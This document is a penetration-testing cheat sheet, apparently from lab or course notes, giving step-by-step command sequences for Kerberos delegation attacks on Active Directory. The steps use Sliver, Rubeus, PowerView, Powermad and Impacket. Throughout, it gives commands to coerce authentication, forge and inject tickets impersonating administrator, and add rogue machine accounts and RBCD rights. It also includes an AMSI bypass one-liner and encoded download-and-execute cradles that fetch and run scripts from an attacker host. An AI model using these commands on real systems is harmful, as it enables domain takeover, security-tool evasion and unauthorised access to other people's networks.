Kerberos Attacks

Unconstrained Delegation

Based on a machine having unconstrained delegation rights.

1) Find out computers/users with Unconstrained Delegation

sharpsh -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -c '"Get-DomainComputer -UnConstrained"'
sharpsh -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -c '"Get-DomainUser -UnConstrained"'

2) Now open two sliver sessions, both should be as the machine account itself (perform getsystem if working as a local admin)

rubeus -t 30 -- monitor /interval:5 /runfor:15 /filteruser:DC06$ /nowrap
rubeus -t 30 -- monitor /interval:5 /runfor:15 /nowrap

3) Open another sliver session and use the session to run SpoolSample/SharpSpoolTrigger to coerce - SharpSpoolTrigger is preferred

execute-assembly -t 20 /home/kali/tools/bins/csharp-files/SpoolSample.exe DC06 machine06
execute-assembly -t 20 /home/kali/tools/bins/csharp-files/SharpSpoolTrigger.exe DC06 machine06

4) Confirm current tickets

execute -o klist

5) We should now have the TGT, inject into current process or launch new one with cmds in shell duplication

rubeus -i -- ptt /ticket:doIFDDCCBQigAwIBBaEDAgEWooIEFD...

6) Check if new ticket is injected

execute -o klist

Constrained Delegation

Machine

1) Check machines for constrained delegation

sharpsh -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -c '"Get-DomainComputer -TrustedToAuth"'

2) Get CIFS ticket and inject in current session

rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /nowrap /ptt

OR Create a new process with Rubeus - Requires admin access to create and inject ticket within it

rubeus -i -t 20 -- createnetonly /program:C:\\Windows\\System32\\cmd.exe /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE7TCCBOlhggTlMIIE4aADAgEFoQobCEVWSUwuQ09No

3) Migrate into the created process

migrate -p 4192

4) Get the current tickets

execute -o klist

5) Do altservice for the host, http/host/cifs

rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:host /nowrap /ptt
rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:http /nowrap /ptt
rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:cifs /nowrap /ptt

6) Check tickets again

execute -o klist

7) We can now access C$ on the host

ls //machine03.domain.com/c$

User

1) Check users for constrained delegation

sharpsh -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -c '"Get-DomainUser -TrustedToAuth"'

2) Convert password into NTLM

rubeus -t 20 -- hash /password:password123

3) Get CIFS ticket and inject in current session

rubeus -t 20 -- s4u /user:user /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /nowrap /ptt

4) Get the current tickets

execute -o klist

5) Do altservice for the host

rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:host /nowrap /ptt
rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:http /nowrap /ptt
rubeus -t 20 -- s4u /user:machine02$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:"cifs/machine03.domain.com" /altservice:cifs /nowrap /ptt

6) Check tickets again

execute -o klist

7) We can now access C$ on the host

ls //machine03.domain.com/c$

Linux

1) Get Ticket for machine03

impacket-getST -spn cifs/machine03 -impersonate administrator 'domain.com/user:password'

2) Declare as var

export KRB5CCNAME=administrator@cifs_machine03.domain.com.ccache
klist

Don't use full FQDN or it causes SMB errors

impacket-psexec -no-pass -k domain.com/administrator@machine03 -target-ip 10.10.100.16

Or use impacket-atexec which should get the sliver session directly

impacket-atexec -k -no-pass domain.com/administrator@machine03 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA=='

Resource-Based Constrained Delegation RBCD

GenericWrite

1) Find machine quota if we can create new computer objects

Get-DomainObject -Properties ms-DS-MachineAccountQuota
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c R2V0LURvbWFpbk9iamVjdCAtUHJvcGVydGllcyBtcy1EUy1NYWNoaW5lQWNjb3VudFF1b3Rh

2) Load PowerMad tool to create new computer object

New-MachineAccount -MachineAccount myComputer -Password $(ConvertTo-SecureString 'h4xxxx2' -AsPlainText -Force)
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/Powermad.ps1 -e -c TmV3LU1hY2hpbmVBY2NvdW50IC1NYWNoaW5lQWNjb3VudCBteUNvbXB1dGVyIC1QYXNzd29yZCAkKENvbnZlcnRUby1TZWN1cmVTdHJpbmcgJ2g0eHh4eDInIC1Bc1BsYWluVGV4dCAtRm9yY2Up

3) Check if the computer object is created

Get-DomainComputer -Identity myComputer
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c R2V0LURvbWFpbkNvbXB1dGVyIC1JZGVudGl0eSBteUNvbXB1dGVy

AMSI Bypass for interactive shell within sliver (in case sharpsh won't work)

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

Loading PowerView in powershell (in case sharpsh won't work)

iex((new-object system.net.webclient).downloadstring('http://10.10.10.11/powershell-scripts/PowerView.ps1'))

4) Get the binary length of the computer - As our user has GenericWrite on the machine08, we can update its attributes. Printing $ExecutionContext.SessionState.LanguageMode just in case to see output if it worked

$sid = Get-DomainComputer -Identity myComputer -Properties objectsid | Select -Expand objectsid; $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"; $SDbytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDbytes,0); Get-DomainComputer -Identity machine08.domain.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}; $ExecutionContext.SessionState.LanguageMode
sharpsh -i -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c JHNpZCA9IEdldC1Eb21haW5Db21wdXRlciAtSWRlbnRpdHkgbXlDb21wdXRlciAtUHJvcGVydGllcyBvYmplY3RzaWQgfCBTZWxlY3QgLUV4cGFuZCBvYmplY3RzaWQ7ICRTRCA9IE5ldy1PYmplY3QgU2VjdXJpdHkuQWNjZXNzQ29udHJvbC5SYXdTZWN1cml0eURlc2NyaXB0b3IgLUFyZ3VtZW50TGlzdCAiTzpCQUQ6KEE7O0NDRENMQ1NXUlBXUERUTE9DUlNEUkNXRFdPOzs7JCgkc2lkKSkiOyAkU0RieXRlcyA9IE5ldy1PYmplY3QgYnl0ZVtdICgkU0QuQmluYXJ5TGVuZ3RoKTsgJFNELkdldEJpbmFyeUZvcm0oJFNEYnl0ZXMsMCk7IEdldC1Eb21haW5Db21wdXRlciAtSWRlbnRpdHkgbWFjaGluZTA4LmRvbWFpbi5jb20gfCBTZXQtRG9tYWluT2JqZWN0IC1TZXQgQHsnbXNkcy1hbGxvd2VkdG9hY3RvbmJlaGFsZm9mb3RoZXJpZGVudGl0eSc9JFNEQnl0ZXN9OyAkRXhlY3V0aW9uQ29udGV4dC5TZXNzaW9uU3RhdGUuTGFuZ3VhZ2VNb2Rl

5) Verify the changes we did - is the msds-allowedtoactonbehalfofotheridentity now present?

$RBCDbytes = Get-DomainComputer machine08.domain.com -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity; $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0; $Descriptor.DiscretionaryAcl
sharpsh -i -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c JFJCQ0RieXRlcyA9IEdldC1Eb21haW5Db21wdXRlciBtYWNoaW5lMDguZG9tYWluLmNvbSAtUHJvcGVydGllcyAnbXNkcy1hbGxvd2VkdG9hY3RvbmJlaGFsZm9mb3RoZXJpZGVudGl0eScgfCBzZWxlY3QgLWV4cGFuZCBtc2RzLWFsbG93ZWR0b2FjdG9uYmVoYWxmb2ZvdGhlcmlkZW50aXR5OyAkRGVzY3JpcHRvciA9IE5ldy1PYmplY3QgU2VjdXJpdHkuQWNjZXNzQ29udHJvbC5SYXdTZWN1cml0eURlc2NyaXB0b3IgLUFyZ3VtZW50TGlzdCAkUkJDRGJ5dGVzLCAwOyAkRGVzY3JpcHRvci5EaXNjcmV0aW9uYXJ5QWNs

6) Generate NTLM hash of the password

rubeus -t 20 -- hash /password:h4xxxx2

7) Create the ticket and inject in current session

rubeus -t 20 -- s4u /user:myComputer$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:CIFS/machine08.domain.com /nowrap
rubeus -t 20 -- s4u /user:myComputer$ /rc4:ffffffffffffffffffffffffffffffff /impersonateuser:administrator /msdsspn:CIFS/machine08.domain.com /nowrap /ptt

OR Create a new process with Rubeus - Requires admin access to add ticket within it

rubeus -i -t 20 -- createnetonly /program:C:\\Windows\\System32\\cmd.exe /ticket:doIGIjCCBh6gAwIBBaEDAgEWooIFJzCCBSNhggUfMIIFG6ADAgEFoRAbDk9QU

8) Migrate into the created process

migrate -p 3116

9) Get the current tickets

execute -o klist

10) Check the details of appsrv01

ls //machine08.domain.com/c$

11) Run psexec now on appsrv01 and get shell access

psexec -d Title -s Description -p osep-lateral machine08.domain.com